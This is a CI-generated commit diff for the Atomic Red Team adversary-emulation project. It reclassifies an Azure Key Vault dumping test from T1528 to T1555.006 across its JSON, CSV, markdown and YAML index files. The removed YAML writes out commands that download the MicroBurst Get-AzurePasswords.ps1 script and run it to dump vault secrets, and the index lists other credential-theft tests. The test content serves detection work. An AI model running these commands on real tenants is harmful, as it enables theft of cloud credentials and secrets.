Generated docs from job=generate-docs branch=master [ci skip]

2025-06-23 16:40:01 +00:00
parent 17b5e21dc2
commit 097ca22bbe
22 changed files with 276 additions and 180 deletions
@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":2,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n- Azure - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- Azure - Dump Azure Storage Account Objects via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1550","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.001","score":2,"enabled":true,"comment":"\n- Azure - Functions code upload - Functions code injection via Blob upload\n- Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.001/T1550.001.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- Azure - Create Snapshot from Managed Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
+{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":2,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n- Azure - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- Azure - Dump Azure Storage Account Objects via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1550","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.001","score":2,"enabled":true,"comment":"\n- Azure - Functions code upload - Functions code injection via Blob upload\n- Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.001/T1550.001.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.006","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.006/T1555.006.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- Azure - Create Snapshot from Managed Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
@@ -19,7 +19,7 @@ defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom I
 credential-access,T1552.005,Unsecured Credentials: Cloud Instance Metadata API,2,Azure - Dump Azure Instance Metadata from Virtual Machines,cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7,powershell
 credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data using stratus,a21118de-b11e-4ebd-b655-42f11142df0c,sh
 credential-access,T1110.003,Brute Force: Password Spraying,9,AWS - Password Spray an AWS using GoAWSConsoleSpray,9c10d16b-20b1-403a-8e67-50ef7117ed4e,sh
-credential-access,T1528,Steal Application Access Token,1,Azure - Dump All Azure Key Vaults with Microburst,1b83cddb-eaa7-45aa-98a5-85fb0a8807ea,powershell
+credential-access,T1555.006,Credentials from Password Stores: Cloud Secrets Management Stores,1,Azure - Dump All Azure Key Vaults with Microburst,1b83cddb-eaa7-45aa-98a5-85fb0a8807ea,powershell
 impact,T1485,Data Destruction,4,GCP - Delete Bucket,4ac71389-40f4-448a-b73f-754346b3f928,sh
 discovery,T1580,Cloud Infrastructure Discovery,1,AWS - EC2 Enumeration from Cloud Instance,99ee161b-dcb1-4276-8ecb-7cfdcb207820,sh
 discovery,T1580,Cloud Infrastructure Discovery,2,AWS - EC2 Security Group Enumeration,99b38f24-5acc-4aa3-85e5-b7f97a5d37ac,command_prompt
@@ -1784,7 +1784,6 @@ credential-access,T1552.001,Unsecured Credentials: Credentials In Files,14,List
 credential-access,T1552.001,Unsecured Credentials: Credentials In Files,15,Find Azure credentials,a8f6148d-478a-4f43-bc62-5efee9f931a4,sh
 credential-access,T1552.001,Unsecured Credentials: Credentials In Files,16,Find GCP credentials,aa12eb29-2dbb-414e-8b20-33d34af93543,sh
 credential-access,T1552.001,Unsecured Credentials: Credentials In Files,17,Find OCI credentials,9d9c22c9-fa97-4008-a204-478cf68c40af,sh
-credential-access,T1528,Steal Application Access Token,1,Azure - Dump All Azure Key Vaults with Microburst,1b83cddb-eaa7-45aa-98a5-85fb0a8807ea,powershell
 credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
 credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
 credential-access,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
@@ -1797,6 +1796,7 @@ credential-access,T1110.004,Brute Force: Credential Stuffing,4,Brute Force:Crede
 credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c7e-ae3ab9e14213,powershell
 credential-access,T1187,Forced Authentication,2,WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS,7f06b25c-799e-40f1-89db-999c9cc84317,powershell
 credential-access,T1187,Forced Authentication,3,Trigger an authenticated RPC call to a target server with no Sign flag set,81cfdd7f-1f41-4cc5-9845-bb5149438e37,powershell
+credential-access,T1555.006,Credentials from Password Stores: Cloud Secrets Management Stores,1,Azure - Dump All Azure Key Vaults with Microburst,1b83cddb-eaa7-45aa-98a5-85fb0a8807ea,powershell
 credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
 credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",2,Access /etc/master.passwd (Local),5076874f-a8e6-4077-8ace-9e5ab54114a5,sh
 credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",3,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh
@@ -2432,8 +2432,7 @@
  - Atomic Test #16: Find GCP credentials [macos, linux]
  - Atomic Test #17: Find OCI credentials [macos, linux]
 - T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1528 Steal Application Access Token](../../T1528/T1528.md)
-  - Atomic Test #1: Azure - Dump All Azure Key Vaults with Microburst [iaas:azure]
+- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1552.006 Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md)
  - Atomic Test #1: GPP Passwords (findstr) [windows]
  - Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
@@ -2460,7 +2459,8 @@
 - T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.009 Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.006 Cloud Secrets Management Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1555.006 Credentials from Password Stores: Cloud Secrets Management Stores](../../T1555.006/T1555.006.md)
+  - Atomic Test #1: Azure - Dump All Azure Key Vaults with Microburst [iaas:azure]
 - [T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md)
  - Atomic Test #1: Access /etc/shadow (Local) [linux]
  - Atomic Test #2: Access /etc/master.passwd (Local) [linux]
@@ -39,7 +39,7 @@
 |  | Hypervisor CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Time Providers](../../T1547.003/T1547.003.md) | [Hijack Execution Flow: DLL](../../T1574.001/T1574.001.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Password Policy Discovery](../../T1201/T1201.md) |  | Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Remote Desktop Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | [Cloud Administration Command](../../T1651/T1651.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Query Registry](../../T1012/T1012.md) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
-|  | Malicious Copy and Paste [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Application Access Token](../../T1528/T1528.md) | [System Location Discovery](../../T1614/T1614.md) |  | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
+|  | Malicious Copy and Paste [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) |  | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
 |  | [Serverless Execution](../../T1648/T1648.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  | Messaging Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Service Discovery](../../T1526/T1526.md) |  |  |  | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) |  |
 |  | [System Services: Service Execution](../../T1569.002/T1569.002.md) | [Modify Registry](../../T1112/T1112.md) | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -54,7 +54,7 @@
 |  |  | IDE Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading](../../T1036/T1036.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | [Process Injection](../../T1055/T1055.md) | Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
-|  |  | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Secrets Management Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
+|  |  | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Cloud Secrets Management Stores](../../T1555.006/T1555.006.md) |  |  |  |  |  |  |
 |  |  | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) |  |  |  |  |  |  |
 |  |  | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Reflective Code Loading](../../T1620/T1620.md) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) |  |  |  |  |  |  |
@@ -48966,7 +48966,6 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
-      identifier: T1528
    atomic_tests: []
  T1552.006:
    technique:
@@ -50018,7 +50017,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -50054,6 +50053,7 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
+      identifier: T1555.006
    atomic_tests: []
  T1003.008:
    technique:
@@ -48052,7 +48052,6 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
-      identifier: T1528
    atomic_tests: []
  T1552.006:
    technique:
@@ -49104,7 +49103,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -49140,6 +49139,7 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
+      identifier: T1555.006
    atomic_tests: []
  T1003.008:
    technique:
@@ -47453,7 +47453,6 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
-      identifier: T1528
    atomic_tests: []
  T1552.006:
    technique:
@@ -48505,7 +48504,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -48541,6 +48540,7 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
+      identifier: T1555.006
    atomic_tests: []
  T1003.008:
    technique:
@@ -47627,7 +47627,6 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
-      identifier: T1528
    atomic_tests: []
  T1552.006:
    technique:
@@ -48679,7 +48678,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -48715,6 +48714,7 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
+      identifier: T1555.006
    atomic_tests: []
  T1003.008:
    technique:
@@ -47453,7 +47453,6 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
-      identifier: T1528
    atomic_tests: []
  T1552.006:
    technique:
@@ -48505,7 +48504,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -48541,6 +48540,7 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
+      identifier: T1555.006
    atomic_tests: []
  T1003.008:
    technique:
@@ -48316,7 +48316,6 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
-      identifier: T1528
    atomic_tests: []
  T1552.006:
    technique:
@@ -49368,7 +49367,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -49404,6 +49403,7 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
+      identifier: T1555.006
    atomic_tests: []
  T1003.008:
    technique:
@@ -48778,77 +48778,7 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
-      identifier: T1528
-    atomic_tests:
-    - name: Azure - Dump All Azure Key Vaults with Microburst
-      auto_generated_guid: 1b83cddb-eaa7-45aa-98a5-85fb0a8807ea
-      description: |-
-        Upon successful execution of this test, the names, locations, and contents of key vaults within an Azure account will be output to a file.
-        See - https://www.netspi.com/blog/technical/cloud-penetration-testing/a-beginners-guide-to-gathering-azure-passwords/
-      supported_platforms:
-      - iaas:azure
-      input_arguments:
-        username:
-          description: Azure AD username
-          type: string
-          default:
-        password:
-          description: Azure AD password
-          type: string
-          default: T1082Az
-        output_file:
-          description: File to dump results to
-          type: string
-          default: "$env:temp\\T1528Test1.txt"
-        subscription_id:
-          description: Azure subscription id to search
-          type: string
-          default:
-      dependency_executor_name: powershell
-      dependencies:
-      - description: 'The Get-AzurePasswords script must exist in PathToAtomicsFolder\..\ExternalPayloads.
-
-          '
-        prereq_command: 'if (test-path "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"){exit
-          0} else {exit 1}
-
-          '
-        get_prereq_command: |
-          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-          invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/AzureRM/Get-AzurePasswords.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
-      - description: 'The Azure RM module must be installed.
-
-          '
-        prereq_command: 'try {if (Get-InstalledModule -Name AzureRM -ErrorAction SilentlyContinue)
-          {exit 0} else {exit 1}} catch {exit 1}
-
-          '
-        get_prereq_command: 'Install-Module -Name AzureRM -Force -allowclobber
-
-          '
-      - description: 'The Azure module must be installed.
-
-          '
-        prereq_command: 'try {if (Get-InstalledModule -Name Azure -ErrorAction SilentlyContinue)
-          {exit 0} else {exit 1}} catch {exit 1}
-
-          '
-        get_prereq_command: 'Install-Module -Name Azure -Force -allowclobber
-
-          '
-      executor:
-        command: |
-          import-module "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
-          $Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
